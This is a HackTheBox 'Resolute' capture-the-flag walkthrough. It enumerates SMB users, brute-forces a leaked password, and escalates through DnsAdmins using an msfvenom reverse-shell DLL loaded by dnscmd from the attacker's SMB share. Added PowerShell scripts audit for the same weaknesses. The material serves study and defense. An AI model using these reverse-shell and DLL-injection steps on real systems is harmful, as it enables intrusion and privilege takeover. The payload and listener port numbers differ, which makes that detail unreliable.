In this article we are going to solve another boot2root challenge, Resolute, from HackTheBox.
As usual we kick off with nmap to find the open ports and the services running on the target system, using the command
sudo nmap -sC -sV -o nmap.txt -Pn 10.10.10.169
So many ports are open. We start with SMB enumeration, and to find open SMB shares we used the command
It looks like anonymous login is successful, but we have no SMB shares. We also tried NULL authentication but got nothing. Next we tried another tool, rpcclient:
rpcclient -U '' 10.10.10.169
After searching on the internet we found some useful commands we can use; here we used enumdomusers.
We have a list of usernames, and this can be useful for brute-forcing the password.
To gain some more information we decided to use another tool, enum4linux.
This looks quite similar to the output we got from rpcclient, but here we have a useful message: Account created. Password set to Welcome123!
Okay, we have usernames and a password, so we decided to brute-force SMB logins using msfconsole.
We have set all the required options. I also don't like my terminal being filled with lots of data, so verbose is set to false. We got a hit for user melanie with password Welcome123!. Till now we have found 0 SMB shares, so there is no use logging into SMB.
Now we try to connect to the machine as user melanie using evil-winrm:
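The message above is the kind of note administrators leave in an account's description attribute, which rpcclient and enum4linux read out to an anonymous caller. The following PowerShell script is an added example, not part of the original walkthrough: it audits every user's description and info attributes for password-like text and lists the members of Pre-Windows 2000 Compatible Access, one common reason anonymous enumeration succeeds on a domain. It assumes the ActiveDirectory RSAT module and a domain-joined admin session; the regex patterns are constructed for this example.

```powershell
# Added example (not from the original walkthrough): find stored passwords in
# AD account text attributes and check one setting that enables anonymous
# enumeration. Assumes the ActiveDirectory module is available.
Import-Module ActiveDirectory

# Constructed heuristics; the walkthrough's "Password set to Welcome123!" matches the first one.
$patterns = @(
    'password\s+(set\s+to|is|:)\s*\S+',
    'pwd\s*[:=]\s*\S+',
    'welcome\d+'
)

function Find-DescriptionSecrets {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    Get-ADUser -Filter * -SearchBase $SearchBase -Properties Description, Info |
        ForEach-Object {
            $user = $_
            $text = @($user.Description, $user.Info) -join ' '
            foreach ($p in $patterns) {
                if ($text -match $p) {
                    $hit  = $Matches[0]
                    $attr = if ($user.Description -match $p) { 'description' } else { 'info' }
                    [pscustomobject]@{
                        SamAccountName = $user.SamAccountName
                        Attribute      = $attr
                        Match          = $hit
                    }
                    break   # one finding per account is enough for the report
                }
            }
        }
}

function Get-AnonymousEnumerationMembers {
    # Anonymous Logon or Everyone in this builtin group lets unauthenticated
    # callers read user and group objects, which is what enumdomusers relies on.
    Get-ADGroupMember -Identity 'Pre-Windows 2000 Compatible Access' |
        Select-Object -ExpandProperty Name
}

Find-DescriptionSecrets | Format-Table -AutoSize
Get-AnonymousEnumerationMembers
```

Any hit from Find-DescriptionSecrets should be treated as a compromised credential: reset the password and clear the attribute. Removing Anonymous Logon / Everyone from the compatibility group closes the anonymous enumeration path, though it should be tested first because legacy applications sometimes depend on it.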
sudo evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!
Now we can read the user flag in the Desktop directory :)
It's time for some enumeration and manual searching, and after some time we found something interesting in C:\
The dir command doesn't give us a useful result, so we run ls -hidden to check for hidden directories and found one called PSTranscripts. We change our directory to this PSTr.... and there we found another hidden directory, and inside that hidden directory we have a .txt file. Let's try to read that file.
Okay, we have the username ryan and a password which is very long (I didn't feel like typing it here ;)
Again we used evil-winrm to connect to the machine as user ryan.
We run whoami /groups to check all the groups and found the interesting group DnsAdmins. We searched online about this group and found that it can be used to get RCE, so what we are going to do is:
Making a dll payload that sends a reverse shell back to our machine with msfvenom.
Serving it using an SMB server to make it available to the Windows machine. We will also set up a netcat listener to catch our reverse shell.
Importing that dll into the DNS server.
Restarting the DNS server so that it loads the dll file.
Command used to prepare the payload:
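The credential here came from a PowerShell transcript: transcription records full command lines, so any password passed as an argument is written to disk in clear text, and a readable transcript directory hands it to the next low-privileged user. The script below is an added example, not from the original walkthrough. It locates the configured transcript output directory (plus C:\PSTranscripts as seen on this box and the default per-user Documents path), reports who can read it, and scans the transcripts for command lines that carry a password; the policy registry path is the standard one, the secret regex is a constructed heuristic.

```powershell
# Added example (not from the original walkthrough): audit PowerShell
# transcription output for exposed credentials. Assumes an admin session.
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
$dirs = @()
if (Test-Path $policy) {
    $cfg = Get-ItemProperty $policy
    if ($cfg.EnableTranscripting -eq 1 -and $cfg.OutputDirectory) { $dirs += $cfg.OutputDirectory }
}
# Constructed candidates: the directory found on this machine and the default
# location transcripts land in when no OutputDirectory policy is set.
$dirs += 'C:\PSTranscripts', (Join-Path $HOME 'Documents')

# Constructed heuristic for command lines that embed a password as an argument.
$secretPattern = 'ConvertTo-SecureString\s+[''"]?\S+|(-Password|--password)\s+\S+|net\s+use\s+\S+\s+\\\\\S+\s+\S+'

function Get-TranscriptExposure {
    param([string[]]$Paths)
    foreach ($dir in ($Paths | Where-Object { Test-Path $_ })) {
        # Anything beyond SYSTEM/Administrators with read access is a finding.
        $readers = (Get-Acl $dir).Access |
            Where-Object { $_.AccessControlType -eq 'Allow' -and $_.FileSystemRights -match 'Read|FullControl' } |
            Select-Object -ExpandProperty IdentityReference -Unique

        $hits = Get-ChildItem $dir -Recurse -Force -Include *.txt -ErrorAction SilentlyContinue |
            Select-String -Pattern $secretPattern

        [pscustomobject]@{
            Directory   = $dir
            Readers     = ($readers -join ', ')
            SecretLines = @($hits).Count
            Files       = (($hits | Select-Object -ExpandProperty Path -Unique) -join ', ')
        }
    }
}

Get-TranscriptExposure -Paths $dirs | Format-List
```

Transcription itself is worth keeping for investigations; the fix is to point OutputDirectory at a location only administrators (or a log collector) can read, rotate any password the scan turns up, and stop passing secrets on the command line in scheduled scripts.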
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.28 LPORT=777 --platform=windows -f dll > haclabs.dll
Now we need to serve this payload, and for that we used the SMB server script that can be found in our Kali Linux system.
Here rest is the name of our SMB share.
Next we need to import the dll into the DNS server, and for that we used the command
dnscmd resolute /config /serverlevelplugindll \\10.10.15.28\rest\haclabs.dll
After that we have to restart the DNS server so that it can load our dll payload.
And we have set up a listener on port 7777 to catch our reverse shell.
We are an admin user now and can read the final flag. Hope you like the walkthrough :)
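From the defender's side, the whole chain above rests on two things: membership of DnsAdmins, and the DNS service reading a ServerLevelPluginDll path (the value that dnscmd /config /serverlevelplugindll writes) and loading it as SYSTEM on the next restart. The script below is an added example, not from the original walkthrough: run on the DNS server, it lists DnsAdmins membership recursively, reports whether a plugin DLL is registered and whether it points at a UNC path or outside System32, and offers a function that clears the registration. It assumes the ActiveDirectory RSAT module and a domain admin session; the registry path is the standard DNS service parameters key.

```powershell
# Added example (not from the original walkthrough): audit the DnsAdmins
# group and the DNS ServerLevelPluginDll registration on a DNS server.
Import-Module ActiveDirectory

$dnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsAdminExposure {
    # 1. Who can set the plugin DLL: DnsAdmins, resolved through nested groups.
    $members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Select-Object -ExpandProperty SamAccountName

    # 2. Is a plugin DLL registered? Missing/empty is the expected state.
    $plugin = (Get-ItemProperty -Path $dnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll

    [pscustomobject]@{
        DnsAdmins            = ($members -join ', ')
        ServerLevelPluginDll = $plugin
        # A UNC path means the service will pull code off a remote share at its
        # next start; a local path outside System32 also deserves a look.
        LoadsFromUNC         = [bool]($plugin -and $plugin -like '\\*')
        OutsideSystem32      = [bool]($plugin -and $plugin -notlike "$env:SystemRoot\System32\*")
    }
}

function Remove-DnsPluginDll {
    # Clears the registration so the next DNS service start loads nothing.
    # The restart (Restart-Service DNS) is left to the operator so it can be scheduled.
    if (Get-ItemProperty -Path $dnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue) {
        Remove-ItemProperty -Path $dnsParams -Name ServerLevelPluginDll
        'ServerLevelPluginDll cleared; restart the DNS service to apply.'
    }
}

Get-DnsAdminExposure | Format-List
```

Keep DnsAdmins empty unless someone actively administers DNS, and alert on two signals: membership changes to the group (security event 4732, since DnsAdmins is a domain local group) and any write to the ServerLevelPluginDll value, which a registry SACL or an endpoint agent can surface. A DNS service restart shortly after either event is the pattern seen in this walkthrough.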